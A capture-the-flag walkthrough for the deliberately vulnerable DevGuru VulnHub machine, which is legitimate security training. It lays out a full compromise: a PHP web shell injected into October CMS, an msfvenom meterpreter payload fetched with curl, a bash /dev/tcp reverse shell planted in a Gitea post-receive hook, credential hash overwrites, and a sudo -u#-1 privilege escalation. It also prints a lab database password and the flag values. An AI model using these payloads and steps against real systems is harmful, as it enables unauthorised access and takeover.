DevGuru: VulnHub CTF Walkthrough

Today we are going to solve a CTF challenge called Devguru: 1 downloaded from Vulnhub. To do that we will be using tools such as Firefox, Wappalyzer, Nmap, Dirb, Metasploit, Git Dumper (You can clone it from here), Netcat, LinEnum Script, and some other online tools.

First, let us find out the IP address of the Devguru virtual machine using our Pentesting Virtual Machine (Kali Linux). Start both the VMs with Network Connection as NAT. Once they are ready to use insert following commands to find out the IP of Devguru machine.

┌──(root💀kali)-[/home/kali]

└─# arp-scan — interface eth0 192.168.238.0/24

Devguru’s IPv4 is 192.168.238.133 for me, it can be different for you so find out that IP and proceed further using your IP. We will visit this address and try to find out what technologies are being used for this application. We will do this by using an add-on called Wappalyzer in the browser. Install this add-on in your browser and visit the application using the IP address we just found.

Here we get information about Devguru application, such as it is developed using a PHP framework called Laravel, it runs on Apache 2.4.29 on Ubuntu. All this information may come in handy in future. Let us perform some directory busting using “dirb” with the following command:

┌──(root💀kali)-[/home/kali]

└─# dirb http://192.168.238.133 /usr/share/wordlists/dirb/big.txt

This provides a bunch of URLs which can have some juicy information. Visit all these URLs to find out what they store. We found that there is a login page of October CMS at http://192.168.238.133/backend, and at location http://192.168.238.133/.htaccess there are some juicy URLs.

This “adminer.php” is a database login page like phpMyAdmin. Now we must find credentials to log in successfully, but before that, we will perform a port scan on 192.168.238.133 using Nmap.

┌──(root💀kali)-[/home/kali]

└─# nmap -T4 -p- 192.168.238.133

The scan result tells us that only port 22, 80, and 8585 are open. Let‘s see what services are running on these ports with version details. To do that we have to run the following command:

┌──(root💀kali)-[/home/kali]

└─# nmap -A -T4 -p22,80,8585 192.168.238.133

We get to know here that there is a git repository available at port 80, we are going to use a python tool called “git-dumper” to dump this repo. Download “git-dumper” from here and change the directory to the newly downloaded tool’s directory in terminal. Dump the repository to the local using following command:

┌──(root💀kali)-[/home/kali/Downloads/git-dumper-master]

└─# ./git-dumper.py http://192.168.238.133/.git devguru

Run “ls” command to ensure that a directory named “devguru” is present with its git repo cloned locally. After looking at the directory structure of the repository we just cloned, one thing is clear that the project is developed using PHP framework as we have already seen in Wappalyzer. So, there must be a file where we can find Database connection details. These details are stored in “devguru/config/database.php”, view the file using “cat” command in terminal and note down the details of MySQL Database.

Now we have both “phpMyAdmin” login page at http://192.168.238.133/backend and the login credentials. Let us login and try to find out admin or user credentials from here.

There is a table in the database with the name “backend_users”, view all the entries of that table. There is only one user “frank” and the password hash for that user is also available in this table. We will use an online tool available at https://www.tunnelsup.com/hash-analyzer/ to identify the type of hash.

Since it is difficult and time taking to decrypt “bcrypt” type of hash thus we will insert a new hash in the database whose decrypted value is known to us. I will be using “NewPassword” with 9 Rounds to generate the hash from here, you can use whatever you want. Insert this new hash as the password hash of user “frank” from phpMyAdmin page. Now visit the October CMS login page which we discovered earlier at “/backend” and enter login credentials as follows:

Username: frank

Password: NewPassword

By now we have access to the database and CMS account but still, we do not have any access over the Server where the Devguru application is hosted. To get that access, we have to deliver some payload. However, from CMS we can only store files with extension as .htm, so we are unable to upload any payload yet. We have another option of inserting commands from URL and then download and run the payload by visiting specific URLs. To do that we are going to edit Home from CMS.

Under Markup tab for “home.htm” file add the following line:

{{ this.page.getShell }}

Also add the following method in the Code tab for “home.htm” file:

function onStart() {

$this->page[‘getShell’] = system($_GET[‘cmd’]);

}

Now save the file and in a new tab visit http://192.168.238.133/?cmd=ls -la and verify that the directory details are visible in the homepage of Devguru.

This verifies that we can insert commands as an argument from URL. Now we will create a PHP payload in our local Pentesting machine and then host it by running a python server so that it can be downloaded from Devguru application to their repository. You can get a list of payloads from here. To create a payload run following commands in terminal:

┌──(root💀kali)-[/home/…/Downloads/git-dumper-master/devguru/config]

└─# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.238.131 LPORT=4444 -f raw > shell.php

└─# cat shell.php | xclip -selection clipboard && echo ‘<?php ‘ | tr -d ‘\n’ > shell.php && xclip -selection clipboard -o >> shell.php

These commands created a PHP payload with name “shell.php”, now we will launch a python server so that we can download it on Devguru.

┌──(root💀kali)-[/home/…/Downloads/git-dumper-master/devguru/config]

└─# python -m SimpleHTTPServer

After launching the server on local Pentesting machine we will download the file to Devguru application by visiting the following URL:

http://192.168.238.133/?cmd=curl 192.168.238.131:8000/shell.php >> a.php

Verify that file “a.php” is available to visit from the web application by visiting the following URL:

http://192.168.238.133/?cmd=ls -la | grep a.php

To get a meterpreter shell, we must launch a handler from the terminal via msfconsole, to do that follow the instruction given in the screenshot.

Once the handler up and listening then visit the URL http://192.168.238.133/a.php to launch the payload. You will find meterpreter shell waiting in the terminal for you. Type “ls” command to verify you have access to the Devguru site.

Let us get a bash shell to get access to tools like git. To do that type shell in the meterpreter and hit enter.

Now check the git version using command git -version (Use double dash before version) to check whether git is accessible from this shell.

Type following command to download a Linux Enumeration script developed by rebootuser and uploaded on GitHub:

git clone https://github.com/rebootuser/LinEnum.git

Wait for a few minutes so that the download gets completed and verify the same by using the “ls” command.

Go inside the directory LinEnum and type following command to run the script:

./LinEnum.sh -s -k keyword -r report -e /tmp/ -t

When prompted for password just press Enter and wait for few minutes till you see scan complete message. The script has given interesting information along with the path of some backup files. Open all of them one by one to see if they store something juicy.

In file /var/backups/app.ini.bak we get database login credentials of “gitea” account. Gitea is an open-source forge software package for hosting software development version control using Git as well as other collaborative features like bug tracking, wikis and code review.

We have already found the database login page URL using directory busting. Visit “/adminer.php” and fill in the required information, do not provide DB Name for this.

Username: gitea

Password: UfFPTF8C8jjxVF2m

Explore the database and table we get a table called “user” inside that we get hashed password of user “frank” and the algo used to encrypt that password. However, it is difficult to decrypt that hash so we will alter the entries of the table to insert new password hash whose decrypted value we already know.

Use the same website which we have used already used earlier to generate new password hash using bcrypt algo with 9 rounds and insert it in the field “passwd”, change the “passwd_hash_algo” to bcrypt and remove entries from field “rands” and “salt”. Save it and visit http://192.168.238.133:8585 to get Gitea Login Page.

Now visit the login page and log in using frank’s credentials, use password whose hash you just calculated and inserted in the table “users”.

Voila! We got the access to the git repository of user frank but still, we cannot do much from here, to get access to root directory we must perform two more exploits. First, we will try to get a reverse shell and then we will perform privilege escalation. To do that create a new repository and name its “test”. Then go to setting of “test” repository and add the following code in “post-receive” under Git Hooks tab:

/bin/bash -i >& /dev/tcp/192.168.238.131/4321 0>&1

Open a new terminal and run following command:

┌──(root💀kali)-[/home/kali]

└─# nc -nlvp 4321

This will start a Netcat listener, leave the listener running and in another terminal clone the newly created repository. After cloning, create a new file inside the repository locally and push the changed repo to the remote repository. Use the following commands to this:

┌──(root💀kali)-[/tmp/ayush]

└─# git clone http://192.168.238.133:8585/frank/test.git

└─# cd test

└─# touch test.txt

└─# git add .

└─# git config — global user.email “frank@devguru.local”

└─# git config — global user.name “frank”

└─# git commit -am “Test Commit”

└─# git push origin master

When prompted for username type “frank” and in password provide the password we used to login to gitea portal for user frank.

Once this is done check the terminal in which listener is running, we have the shell access of frank.

Still, we cannot access the “root” directory, so we have to perform privilege escalation. To do that we have to check user’s privileges by giving command sudo -l and use sudo -V to check the version of Sudo. This information can be used to check if any vulnerability or exploit is available to perform privilege escalation.

On googling we get to know that the following command can be used to perform privilege escalation:

frank@devguru:/$ sudo -u#-1 sqlite3 /dev/null ‘.shell /bin/bash’

Congratulations! Now we are root, navigate to “root” directory and view the contents of root.txt file.

Navigate to /home/frank to view user.txt.

Root.txt -> 96440606fb88aa7497cde5a8e68daf8f

User.txt -> 22854d0aec6ba776f9d35bf7b0e00217